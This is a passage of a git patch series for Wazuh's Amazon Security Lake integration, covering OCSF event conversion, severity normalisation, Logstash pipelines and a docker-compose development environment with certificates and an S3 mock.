datetime.datetime.now(datetime.timezone.utc) - - try: - while True: - - current_block = map_block( stdin, args.linebuffer ) - - if current_block[-1] == block_ending: - output_buffer += current_block[0:-1] - time.sleep(args.sleeptime) - else: - output_buffer += current_block - - if len(output_buffer) == 0: - continue - - if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: - logging.info('Writing data to parquet file') - encode_parquet(output_buffer,args.outputfolder,'wazuh-{}'.format(date)) - starttimestamp = datetime.datetime.now(datetime.timezone.utc) - output_buffer = [] - - except KeyboardInterrupt: - logging.info("Keyboard Interrupt issued") - exit(0) - - logging.info('FINISHED RETRIEVING STDIN') - - except Exception as e: - logging.error("Error running script") - logging.error(e) - raise diff --git a/integrations/amazon-security-lake/transform/legacy/legacy_converter.py b/integrations/amazon-security-lake/transform/legacy/legacy_converter.py deleted file mode 100644 index 2a14b75957c97..0000000000000 --- a/integrations/amazon-security-lake/transform/legacy/legacy_converter.py +++ /dev/null @@ -1,87 +0,0 @@ -#!/usr/bin/python - -# event comes from Filebeat -event = {} - - -def normalize(level: int) -> int: - """ - Normalizes rule level into the 0-6 range, required by OCSF. - """ - # TODO normalization - return level - - -def join(iterable, separator=","): - return (separator.join(iterable)) - - -def convert(event: dict) -> dict: - """ - Converts Wazuh events to OCSF's Detecting Finding (2004) class. - """ - ocsf_class_template = \ - { - "activity_id": 1, - "category_name": "Findings", - "category_uid": 2, - "class_name": "Detection Finding", - "class_uid": 2004, - "count": event["rule"]["firedtimes"], - "message": event["rule"]["description"], - "finding_info": { - "analytic": { - "category": join(event["rule"]["groups"]), - "name": event["decoder"]["name"], - "type_id": 1, - "uid": event["rule"]["id"], - }, - "attacks": { - "tactic": { - "name": join(event["rule"]["mitre"]["tactic"]), - }, - "technique": { - "name": join(event["rule"]["mitre"]["technique"]), - "uid": join(event["rule"]["mitre"]["id"]), - }, - "version": "v13.1" - }, - "title": event["rule"]["description"], - "types": [ - event["input"]["type"] - ], - "uid": event['id'] - }, - "metadata": { - "log_name": "Security events", - "log_provider": "Wazuh", - "product": { - "name": "Wazuh", - "lang": "en", - "vendor_name": "Wazuh, Inc,." - }, - "version": "1.1.0", - }, - "raw_data": event["full_log"], - "resources": [ - { - "name": event["agent"]["name"], - "uid": event["agent"]["id"] - }, - ], - "risk_score": event["rule"]["level"], - "severity_id": normalize(event["rule"]["level"]), - "status_id": 99, - "time": event["timestamp"], - "type_uid": 200401, - "unmapped": { - "data_sources": [ - event["_index"], - event["location"], - event["manager"]["name"] - ], - "nist": event["rule"]["nist_800_53"], # Array - } - } - - return ocsf_class_template diff --git a/integrations/amazon-security-lake/transform/legacy/legacy_test.py b/integrations/amazon-security-lake/transform/legacy/legacy_test.py deleted file mode 100644 index ebcb8fa4b2e90..0000000000000 --- a/integrations/amazon-security-lake/transform/legacy/legacy_test.py +++ /dev/null @@ -1,15 +0,0 @@ -#!/usr/bin/python - -from transform.legacy.converter import convert -import json - -converted_event = {} -with open("../wazuh-event.sample.json", "r") as fd: - sample_event = json.load(fd) - # print(json.dumps(sample_event, indent=4)) - converted_event = convert(sample_event) - -if converted_event: - with open("../wazuh-event.ocsf.json", "w") as fd: - json.dump(converted_event, fd) - print("Done") diff --git a/integrations/docker/docker-compose.yml b/integrations/docker/docker-compose.yml deleted file mode 100644 index dd7f12f119e05..0000000000000 --- a/integrations/docker/docker-compose.yml +++ /dev/null @@ -1,117 +0,0 @@ -version: "3.8" - -services: - - events-generator: - image: events-generator - build: - dockerfile_inline: | - FROM ubuntu:20.04 - RUN apt update && apt install -y python3-requests - container_name: events-generator - volumes: - - ../tools/events-generator:/home/events-generator - hostname: events-generator - working_dir: "/home/events-generator" - entrypoint: sh -c "python3 run.py" - networks: - wazuh-indexer-dev: - aliases: - - events-generator - ipv4_address: 172.18.0.2 - depends_on: - - wazuh-indexer - - wazuh-indexer: - image: wazuh/wazuh-indexer:4.8.0-beta1 - container_name: wazuh-indexer - hostname: wazuh-indexer - restart: always - networks: - wazuh-indexer-dev: - aliases: - - wazuh-indexer - ipv4_address: 172.18.0.3 - ports: - - "9222:9200" - depends_on: - - generator - environment: - - "OPENSEARCH_JAVA_OPTS=-Xms1g -Xmx1g" - - "bootstrap.memory_lock=true" - - 'INDEXER_PASSWORD=SecretPassword' - ulimits: - memlock: - soft: -1 - hard: -1 - nofile: - soft: 65536 - hard: 65536 - volumes: - - ./wazuh-indexer-data:/var/lib/wazuh-indexer - - ./config/wazuh_indexer_ssl_certs/root-ca.pem:/usr/share/wazuh-indexer/certs/root-ca.pem - - ./config/wazuh_indexer_ssl_certs/wazuh1.indexer-key.pem:/usr/share/wazuh-indexer/certs/wazuh1.indexer.key - - ./config/wazuh_indexer_ssl_certs/wazuh1.indexer.pem:/usr/share/wazuh-indexer/certs/wazuh1.indexer.pem - - ./config/wazuh_indexer_ssl_certs/admin.pem:/usr/share/wazuh-indexer/certs/admin.pem - - ./config/wazuh_indexer_ssl_certs/admin-key.pem:/usr/share/wazuh-indexer/certs/admin-key.pem - - ./config/wazuh_indexer/wazuh1.indexer.yml:/usr/share/wazuh-indexer/opensearch.yml - - ./config/wazuh_indexer/internal_users.yml:/usr/share/wazuh-indexer/opensearch-security/internal_users.yml - - generator: - image: wazuh/wazuh-certs-generator:0.0.1 - hostname: wazuh-certs-generator - volumes: - - ./config/wazuh_indexer_ssl_certs/:/certificates/ - - ./config/certs.yml:/config/certs.yml - environment: - - HTTP_PROXY=YOUR_PROXY_ADDRESS_OR_DNS - - logstash: - image: logstash - build: - dockerfile_inline: | - FROM ubuntu:20.04 - RUN apt update && apt install -y iputils-ping wget gpg apt-transport-https - WORKDIR /home/logstash - RUN wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | gpg --dearmor -o /usr/share/keyrings/elastic-keyring.gpg && \ - echo "deb [signed-by=/usr/share/keyrings/elastic-keyring.gpg] https://artifacts.elastic.co/packages/8.x/apt stable main" | tee -a /etc/apt/sources.list.d/elastic-8.x.list && \ - apt update && \ - apt install -y logstash && \ - chown -R logstash:logstash /etc/logstash && \ - chown logstash:logstash /home/logstash - entrypoint: /usr/share/bin/logstash --path.settings /etc/logstash --config.reload.automatic - container_name: logstash - hostname: logstash - user: logstash - volumes: - - ../amazon-security-lake:/home/logstash - - ../amazon-security-lake/logstash/pipe-output.conf:/etc/logstash/conf.d/pipe-output.conf - - ../amazon-security-lake/logstash/pipelines.yml:/etc/logstash/pipelines.yml - networks: - wazuh-indexer-dev: - aliases: - - logstash - ipv4_address: 172.18.0.4 - depends_on: - - wazuh-indexer - - s3-ninja - - s3-ninja: - image: scireum/s3-ninja - container_name: s3-ninja - hostname: s3-ninja - volumes: - - ./s3-ninja_data:/home/sirius/data - networks: - wazuh-indexer-dev: - aliases: - - s3-ninja - ipv4_address: 172.18.0.5 - ports: - - "9444:9000" - -networks: - wazuh-indexer-dev: - ipam: - config: - - subnet: "172.18.0.0/16" From 5fcc9a394a339f373a5a7a557bc302b7efcfc42e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Thu, 22 Feb 2024 16:19:33 +0100 Subject: [PATCH 28/34] Cleanup --- integrations/amazon-security-lake/run.py | 10 ---------- 1 file changed, 10 deletions(-) diff --git a/integrations/amazon-security-lake/run.py b/integrations/amazon-security-lake/run.py index 515d1d97610f9..c26adffa2ea0f 100644 --- a/integrations/amazon-security-lake/run.py +++ b/integrations/amazon-security-lake/run.py @@ -17,19 +17,9 @@ def _test(): print("--") print("") print(ocsf_event) - # event = Event.model_validate_json(json.dumps(event)) - # print(event) - # ocsf_event = to_detection_finding(event) except KeyError as e: raise (e) - # except ValidationError as e: - # print(e) - - # if ocsf_event: - # with open("wazuh-event.ocsf.json", "w") as fd: - # json.dump(ocsf_event.model_dump(), fd) - # print(ocsf_event.model_dump()) if __name__ == '__main__': From a2464104dfcddfb28f4376d12a38bd1cc07ac3e1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Thu, 22 Feb 2024 18:06:09 +0100 Subject: [PATCH 29/34] Add FQDN hostnames to services for certificates creation --- integrations/docker/amazon-security-lake.yml | 49 +++++++++++--------- 1 file changed, 26 insertions(+), 23 deletions(-) diff --git a/integrations/docker/amazon-security-lake.yml b/integrations/docker/amazon-security-lake.yml index 67effe4deed55..5c2b09d133089 100644 --- a/integrations/docker/amazon-security-lake.yml +++ b/integrations/docker/amazon-security-lake.yml @@ -7,20 +7,21 @@ services: context: ../tools/events-generator container_name: events-generator depends_on: - - opensearch-node + - wazuh.indexer networks: - - opensearch-net + - net # TODO add healthcheck to indexer's service to avoid sending requests before API is ready. - command: bash -c "sleep 10 && echo 'Ey, wake up!' && python run.py -a opensearch-node" + command: bash -c "sleep 10 && echo 'Ey, wake up!' && python run.py -a wazuh.indexer" - opensearch-node: - image: opensearchproject/opensearch:latest # This should be the same image used for opensearch-node1 to avoid issues - container_name: opensearch-node + wazuh.indexer: + image: opensearchproject/opensearch:latest + container_name: wazuh.indexer + hostname: wazuh.indexer environment: - - cluster.name=opensearch-cluster - - node.name=opensearch-node - - discovery.seed_hosts=opensearch-node - - cluster.initial_cluster_manager_nodes=opensearch-node + # - cluster.name=opensearch-cluster + - node.name=wazuh.indexer + - discovery.type=single-node + # - cluster.initial_cluster_manager_nodes=opensearch-node - bootstrap.memory_lock=true - "OPENSEARCH_JAVA_OPTS=-Xms512m -Xmx512m" ulimits: @@ -31,26 +32,28 @@ services: soft: 65536 hard: 65536 volumes: - - opensearch-data:/usr/share/opensearch/data + - data:/usr/share/opensearch/data networks: - - opensearch-net + - net - opensearch-dashboards: + wazuh.dashboard: image: opensearchproject/opensearch-dashboards:latest # Make sure the version of opensearch-dashboards matches the version of opensearch installed on other nodes - container_name: opensearch-dashboards + container_name: wazuh.dashboard + hostname: wazuh.dashboard ports: - 5601:5601 # Map host port 5601 to container port 5601 expose: - "5601" # Expose port 5601 for web access to OpenSearch Dashboards environment: - OPENSEARCH_HOSTS: '["https://opensearch-node:9200"]' # Define the OpenSearch nodes that OpenSearch Dashboards will query + OPENSEARCH_HOSTS: '["https://wazuh.indexer:9200"]' # Define the OpenSearch nodes that OpenSearch Dashboards will query networks: - - opensearch-net - logstash: + - net + wazuh.integration.security.lake: image: wazuh/indexer-security-lake-integration build: context: ../amazon-security-lake - container_name: logstash + container_name: wazuh.integration.security.lake + hostname: wazuh.integration.security.lake environment: LOG_LEVEL: trace LOGSTASH_KEYSTORE_PASS: "SecretPassword" @@ -63,14 +66,14 @@ services: volumes: - ../amazon-security-lake/logstash/pipeline:/usr/share/logstash/pipeline depends_on: - - opensearch-node + - wazuh.indexer networks: - - opensearch-net + - net command: tail -f /dev/null - # command: /usr/share/logstash/bin/logstash -f /usr/share/logstash/pipeline/indexer-to-integrator.config --path.settings /etc/logstash + # command: /usr/share/logstash/bin/logstash -f /usr/share/logstash/pipeline/indexer-to-integrator.conf --path.settings /etc/logstash volumes: - opensearch-data: + data: networks: - opensearch-net: \ No newline at end of file + net: \ No newline at end of file From b72d2b5eaf38c7753ebe5f4e96e16620aac9d5fe Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Thu, 29 Feb 2024 16:29:43 +0100 Subject: [PATCH 30/34] Add S3 Ninja (Mock) (#165) --- integrations/docker/amazon-security-lake.yml | 15 +++++++++++++++ 1 file changed, 15 insertions(+) diff --git a/integrations/docker/amazon-security-lake.yml b/integrations/docker/amazon-security-lake.yml index 5c2b09d133089..d44598029eb0f 100644 --- a/integrations/docker/amazon-security-lake.yml +++ b/integrations/docker/amazon-security-lake.yml @@ -48,6 +48,7 @@ services: OPENSEARCH_HOSTS: '["https://wazuh.indexer:9200"]' # Define the OpenSearch nodes that OpenSearch Dashboards will query networks: - net + wazuh.integration.security.lake: image: wazuh/indexer-security-lake-integration build: @@ -58,6 +59,8 @@ services: LOG_LEVEL: trace LOGSTASH_KEYSTORE_PASS: "SecretPassword" MONITORING_ENABLED: false + AWS_KEY: "AKIAIOSFODNN7EXAMPLE" + AWS_SECRET: "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY" ports: - "5000:5000/tcp" - "5000:5000/udp" @@ -72,8 +75,20 @@ services: command: tail -f /dev/null # command: /usr/share/logstash/bin/logstash -f /usr/share/logstash/pipeline/indexer-to-integrator.conf --path.settings /etc/logstash + s3.ninja: + image: scireum/s3-ninja:latest + container_name: s3.ninja + hostname: s3.ninja + ports: + - "9444:9000" + volumes: + - s3-data:/home/sirius/data + networks: + - net + volumes: data: + s3-data: networks: net: \ No newline at end of file From 90cb9abe7525a3ac51217745c83b94236294c0f4 Mon Sep 17 00:00:00 2001 From: Federico Gustavo Galland <99492720+f-galland@users.noreply.github.com> Date: Thu, 29 Feb 2024 13:10:58 -0300 Subject: [PATCH 31/34] Setup certificates in Wazuh Indexer and Logstash containers (#166) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * Add certificate generator service * Add certificate config to docker compose file * Use secrets for certificates * Disable permission handling inside cert's generator entrypoint.sh * Back to using a bind mount for certs * Have entrypoint.sh generate certs with 1000:1000 ownership * Correct certificate permissions and bind mounting * Add security initialization variable to compose file * Fix permissions on certs generator entrypoint * Add cert generator config file * Remove old cert generator dir * Set indexer hostname right in pipeline file * Roll back commented code --------- Signed-off-by: Álex Ruiz Co-authored-by: Álex Ruiz --- integrations/.gitignore | 3 +- .../pipeline/indexer-to-integrator.conf | 22 +++--- integrations/docker/amazon-security-lake.yml | 69 ++++++++++++------- integrations/docker/config/certs.yml | 16 +++++ 4 files changed, 72 insertions(+), 38 deletions(-) create mode 100644 integrations/docker/config/certs.yml diff --git a/integrations/.gitignore b/integrations/.gitignore index 8f10b6459740c..ee1a01f52633d 100644 --- a/integrations/.gitignore +++ b/integrations/.gitignore @@ -2,4 +2,5 @@ elastic opensearch splunk common -config \ No newline at end of file +config +docker/certs \ No newline at end of file diff --git a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf index 0cc7a7d089ec3..2f70beebbfaaa 100644 --- a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf +++ b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf @@ -1,9 +1,10 @@ input { opensearch { - hosts => ["opensearch-node:9200"] + hosts => ["wazuh.indexer:9200"] user => "${INDEXER_USERNAME}" password => "${INDEXER_PASSWORD}" - ssl => false + ssl => true + ca_file => "/usr/share/logstash/root-ca.pem" index => "wazuh-alerts-4.x-*" query => '{ "query": { @@ -20,15 +21,10 @@ input { } output { - - stdout { codec => rubydebug } - - pipe - { - id => "securityLake" - message_format => "%{_source}" - ttl => "10" - command => "/usr/bin/env python3 /usr/local/bin/stdin_to_securitylake.py -d" - } - + pipe { + id => "securityLake" + message_format => "%{_source}" + ttl => "10" + command => "/usr/bin/env python3 /usr/local/bin/stdin_to_securitylake.py -d" + } } diff --git a/integrations/docker/amazon-security-lake.yml b/integrations/docker/amazon-security-lake.yml index d44598029eb0f..65a8905bcd987 100644 --- a/integrations/docker/amazon-security-lake.yml +++ b/integrations/docker/amazon-security-lake.yml @@ -1,4 +1,4 @@ -version: '3' +version: "3.8" name: "amazon-security-lake" services: events-generator: @@ -7,22 +7,35 @@ services: context: ../tools/events-generator container_name: events-generator depends_on: - - wazuh.indexer - networks: - - net - # TODO add healthcheck to indexer's service to avoid sending requests before API is ready. - command: bash -c "sleep 10 && echo 'Ey, wake up!' && python run.py -a wazuh.indexer" + wazuh.indexer: + condition: service_healthy + command: bash -c "python run.py -a wazuh.indexer" wazuh.indexer: - image: opensearchproject/opensearch:latest + image: opensearchproject/opensearch:2.11.1 container_name: wazuh.indexer + depends_on: + wazuh-certs-generator: + condition: service_completed_successfully hostname: wazuh.indexer + ports: + - 9200:9200 environment: # - cluster.name=opensearch-cluster - node.name=wazuh.indexer - discovery.type=single-node # - cluster.initial_cluster_manager_nodes=opensearch-node - bootstrap.memory_lock=true + - "DISABLE_INSTALL_DEMO_CONFIG=true" + - plugins.security.ssl.http.enabled=true + - plugins.security.allow_default_init_securityindex=true + - plugins.security.ssl.http.pemcert_filepath=/usr/share/opensearch/config/wazuh.indexer.pem + - plugins.security.ssl.transport.pemcert_filepath=/usr/share/opensearch/config/wazuh.indexer.pem + - plugins.security.ssl.http.pemkey_filepath=/usr/share/opensearch/config/wazuh.indexer-key.pem + - plugins.security.ssl.transport.pemkey_filepath=/usr/share/opensearch/config/wazuh.indexer-key.pem + - plugins.security.ssl.http.pemtrustedcas_filepath=/usr/share/opensearch/config/root-ca.pem + - plugins.security.ssl.transport.pemtrustedcas_filepath=/usr/share/opensearch/config/root-ca.pem + - plugins.security.authcz.admin_dn="CN=wazuh.indexer,OU=Wazuh,O=Wazuh,L=California, C=US" - "OPENSEARCH_JAVA_OPTS=-Xms512m -Xmx512m" ulimits: memlock: @@ -31,14 +44,21 @@ services: nofile: soft: 65536 hard: 65536 + healthcheck: + test: curl -sku admin:admin https://localhost:9200/_cat/health | grep -q docker-cluster + start_period: 10s + start_interval: 3s volumes: - data:/usr/share/opensearch/data - networks: - - net + - ./certs/wazuh.indexer.pem:/usr/share/opensearch/config/wazuh.indexer.pem + - ./certs/wazuh.indexer-key.pem:/usr/share/opensearch/config/wazuh.indexer-key.pem + - ./certs/root-ca.pem:/usr/share/opensearch/config/root-ca.pem wazuh.dashboard: - image: opensearchproject/opensearch-dashboards:latest # Make sure the version of opensearch-dashboards matches the version of opensearch installed on other nodes + image: opensearchproject/opensearch-dashboards:2.11.1 container_name: wazuh.dashboard + depends_on: + - wazuh.indexer hostname: wazuh.dashboard ports: - 5601:5601 # Map host port 5601 to container port 5601 @@ -46,14 +66,14 @@ services: - "5601" # Expose port 5601 for web access to OpenSearch Dashboards environment: OPENSEARCH_HOSTS: '["https://wazuh.indexer:9200"]' # Define the OpenSearch nodes that OpenSearch Dashboards will query - networks: - - net - + wazuh.integration.security.lake: image: wazuh/indexer-security-lake-integration build: context: ../amazon-security-lake container_name: wazuh.integration.security.lake + depends_on: + - wazuh.indexer hostname: wazuh.integration.security.lake environment: LOG_LEVEL: trace @@ -68,12 +88,9 @@ services: - "9600:9600" volumes: - ../amazon-security-lake/logstash/pipeline:/usr/share/logstash/pipeline - depends_on: - - wazuh.indexer - networks: - - net - command: tail -f /dev/null - # command: /usr/share/logstash/bin/logstash -f /usr/share/logstash/pipeline/indexer-to-integrator.conf --path.settings /etc/logstash + - ./certs/root-ca.pem:/usr/share/logstash/root-ca.pem + # command: tail -f /dev/null + command: /usr/share/logstash/bin/logstash -f /usr/share/logstash/pipeline/indexer-to-integrator.conf --path.settings /etc/logstash --config.reload.automatic s3.ninja: image: scireum/s3-ninja:latest @@ -83,12 +100,16 @@ services: - "9444:9000" volumes: - s3-data:/home/sirius/data - networks: - - net + + wazuh-certs-generator: + image: wazuh/wazuh-certs-generator:0.0.1 + hostname: wazuh-certs-generator + container_name: wazuh-certs-generator + entrypoint: sh -c "/entrypoint.sh; chown -R 1000:999 /certificates; chmod 740 /certificates; chmod 440 /certificates/*" + volumes: + - ./certs/:/certificates/ + - ./config/certs.yml:/config/certs.yml volumes: data: s3-data: - -networks: - net: \ No newline at end of file diff --git a/integrations/docker/config/certs.yml b/integrations/docker/config/certs.yml new file mode 100644 index 0000000000000..c3e017be10eea --- /dev/null +++ b/integrations/docker/config/certs.yml @@ -0,0 +1,16 @@ +nodes: + # Wazuh indexer server nodes + indexer: + - name: wazuh.indexer + ip: wazuh.indexer + + # Wazuh server nodes + # Use node_type only with more than one Wazuh manager + server: + - name: wazuh.manager + ip: wazuh.manager + + # Wazuh dashboard node + dashboard: + - name: wazuh.dashboard + ip: wazuh.dashboard From c111dee7affbc6f7092d075b71a7c38560e43a38 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Thu, 29 Feb 2024 17:17:45 +0100 Subject: [PATCH 32/34] Fix Logstash pipelines --- .../logstash/pipeline/indexer-to-file.conf | 6 ++++-- .../logstash/pipeline/indexer-to-integrator.conf | 2 +- .../logstash/pipeline/indexer-to-s3.conf | 10 +++++----- 3 files changed, 10 insertions(+), 8 deletions(-) diff --git a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf index e3fa60a785372..4d5a47169e197 100644 --- a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf +++ b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf @@ -1,9 +1,10 @@ input { opensearch { - hosts => ["opensearch-node:9200"] + hosts => ["wazuh.indexer:9200"] user => "${INDEXER_USERNAME}" password => "${INDEXER_PASSWORD}" - ssl => false + ssl => true + ca_file => "/usr/share/logstash/root-ca.pem" index => "wazuh-alerts-4.x-*" query => '{ "query": { @@ -19,6 +20,7 @@ input { } } + output { file { path => "/usr/share/logstash/pipeline/indexer-to-file.json" diff --git a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf index 2f70beebbfaaa..81a4bdad5883a 100644 --- a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf +++ b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf @@ -25,6 +25,6 @@ output { id => "securityLake" message_format => "%{_source}" ttl => "10" - command => "/usr/bin/env python3 /usr/local/bin/stdin_to_securitylake.py -d" + command => "/usr/bin/env python3 /usr/local/bin/run.py -d" } } diff --git a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-s3.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-s3.conf index 6ca2ca0d5a08f..22d44b9d0d3f5 100644 --- a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-s3.conf +++ b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-s3.conf @@ -1,11 +1,11 @@ input { opensearch { - hosts => ["localhost:9200"] - user => "${WAZUH_INDEXER_USERNAME}" - password => "${WAZUH_INDEXER_PASSWORD}" - index => "wazuh-alerts-4.x-*" + hosts => ["wazuh.indexer:9200"] + user => "${INDEXER_USERNAME}" + password => "${INDEXER_PASSWORD}" ssl => true - ca_file => "/etc/logstash/wi-certs/root-ca.pem" + ca_file => "/usr/share/logstash/root-ca.pem" + index => "wazuh-alerts-4.x-*" query => '{ "query": { "range": { From b84ff0bfcf627f6885c5d425a67780f2e167c0e0 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Thu, 29 Feb 2024 18:17:57 +0100 Subject: [PATCH 33/34] Remove unused file --- integrations/ocsf-mapping.json | 86 ---------------------------------- 1 file changed, 86 deletions(-) delete mode 100644 integrations/ocsf-mapping.json diff --git a/integrations/ocsf-mapping.json b/integrations/ocsf-mapping.json deleted file mode 100644 index c1238dac285df..0000000000000 --- a/integrations/ocsf-mapping.json +++ /dev/null @@ -1,86 +0,0 @@ -{ - "1.0.0": - { - "constants": - { - "activity_id" : 1, - "analytic.type" : "Rule", - "analytic.type_id" : 1, - "attacks.version" : "v13.1", - "category_name" : "Findings", - "category_uid" : 2, - "class_name" : "Security Finding", - "class_uid" : 2001, - "metadata.log_name" : "Security events", - "metadata.log_provider" : "Wazuh", - "metadata.product.lang" : "en", - "metadata.product.name" : "Wazuh", - "metadata.product.vendor_name" : "Wazuh, Inc.", - "metadata.product.version" : "4.9.0", - "status_id" : 99, - "type_uid" : 200101 - }, - "mappings": - { - "analytic.category" : "rule.groups", - "analytic.name" : "decoder.name", - "analytic.uid" : "rule.id", - "attacks.tactics" : "rule.mitre.tactic", - "attacks.technique" : "rule.mitre.technique", - "count" : "rule.firedtimes", - "data_sources" : ["_index", "location", "manager.name"], - "finding.title" : "rule.description", - "finding.types" : "input.type", - "finding.uid" : "id", - "message" : "rule.description", - "nist" : "rule.nist_800_53", - "raw_data" : "full_log", - "resources.name" : "agent.name", - "resources.uid" : "agent.id", - "risk_score" : "rule.level", - "severity_id" : "rule.level", - "time" : "timestamp" - } - }, - "1.1.0": - { - "constants": - { - "activity_id" : 1, - "category_name" : "Findings", - "category_uid" : 2, - "class_name" : "Security Finding", - "class_uid" : 2001, - "finding_info.analytic.type" : "Rule", - "finding_info.analytic.type_id" : 1, - "finding_info.attacks.version" : "v13.1", - "metadata.log_name" : "Security events", - "metadata.log_provider" : "Wazuh", - "metadata.product.lang" : "en", - "metadata.product.name" : "Wazuh", - "metadata.product.vendor_name" : "Wazuh, Inc.", - "metadata.product.version" : "4.9.0", - "status_id" : 99, - "type_uid" : 200101 - }, - "mappings": - { - "count" : "rule.firedtimes", - "finding_info.analytic.category" : "rule.groups", - "finding_info.analytic.name" : "decoder.name", - "finding_info.analytic.uid" : "rule.id", - "finding_info.attacks.tactic" : "rule.mitre.tactic", - "finding_info.attacks.technique" : "rule.mitre.technique", - "finding_info.title" : "rule.description", - "finding_info.types" : "input.type", - "finding_info.uid" : "id", - "message" : "rule.description", - "raw_data" : "full_log", - "resources.name" : "agent.name", - "resources.uid" : "agent.id", - "risk_score" : "rule.level", - "severity_id" : "rule.level", - "time" : "timestamp" - } - } -} From 1210c077a2cb03985633d6bc8b698dc35cdcd958 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Fri, 1 Mar 2024 17:15:28 +0100 Subject: [PATCH 34/34] Implement OCSF severity normalize function --- integrations/README.md | 7 +++- .../amazon-security-lake/parquet/test.py | 1 - .../transform/converter.py | 42 +++++++------------ 3 files changed, 20 insertions(+), 30 deletions(-) diff --git a/integrations/README.md b/integrations/README.md index 5e69b4f673d6c..ae3253b8547b8 100644 --- a/integrations/README.md +++ b/integrations/README.md @@ -5,7 +5,12 @@ The goal is to transport Wazuh's analysis to the platform that suits your needs. ### Amazon Security Lake -TBD +Amazon Security Lake automatically centralizes security data from AWS environments, SaaS providers, +on premises, and cloud sources into a purpose-built data lake stored in your account. With Security Lake, +you can get a more complete understanding of your security data across your entire organization. You can +also improve the protection of your workloads, applications, and data. Security Lake has adopted the +Open Cybersecurity Schema Framework (OCSF), an open standard. With OCSF support, the service normalizes +and combines security data from AWS and a broad range of enterprise security data sources. ##### Usage diff --git a/integrations/amazon-security-lake/parquet/test.py b/integrations/amazon-security-lake/parquet/test.py index 2022111b25e33..318da6ebe4740 100644 --- a/integrations/amazon-security-lake/parquet/test.py +++ b/integrations/amazon-security-lake/parquet/test.py @@ -4,7 +4,6 @@ from parquet import Parquet import json -# converted_event = {} with open("wazuh-event.ocsf.json", "r") as fd: events = [json.load(fd)] table = pa.Table.from_pylist(events) diff --git a/integrations/amazon-security-lake/transform/converter.py b/integrations/amazon-security-lake/transform/converter.py index 983ba9572841f..90f8eeef27bac 100644 --- a/integrations/amazon-security-lake/transform/converter.py +++ b/integrations/amazon-security-lake/transform/converter.py @@ -8,8 +8,20 @@ def normalize(level: int) -> int: """ Normalizes rule level into the 0-6 range, required by OCSF. """ - # TODO normalization - return level + if level >= 15: # (5) Critical + severity = 5 + elif level >= 11: # (4) High + severity = 4 + elif level >= 8: # (3) Medium + severity = 3 + elif level >= 4: # (2) Low + severity = 2 + elif level >= 0: # (1) Informational + severity = 1 + else: + severity = 0 # (0) Unknown + + return severity def join(iterable, separator=","): @@ -84,29 +96,3 @@ def from_json(event: dict) -> models.wazuh.Event: return models.wazuh.Event.model_validate_json(json.dumps(event)) except pydantic.ValidationError as e: print(e) - - -def _test(): - ocsf_event = {} - with open("wazuh-event.sample.json", "r") as fd: - # Load from file descriptor - event = json.load(fd) - try: - # Create instance of Event from JSON input (must be string, bytes or bytearray) - event = models.wazuh.Event.model_validate_json(json.dumps(event)) - print(event) - ocsf_event = to_detection_finding(event) - - except KeyError as e: - raise (e) - except pydantic.ValidationError as e: - print(e) - - if ocsf_event: - with open("wazuh-event.ocsf.json", "w") as fd: - json.dump(ocsf_event.model_dump(), fd) - print(ocsf_event.model_dump()) - - -if __name__ == '__main__': - _test()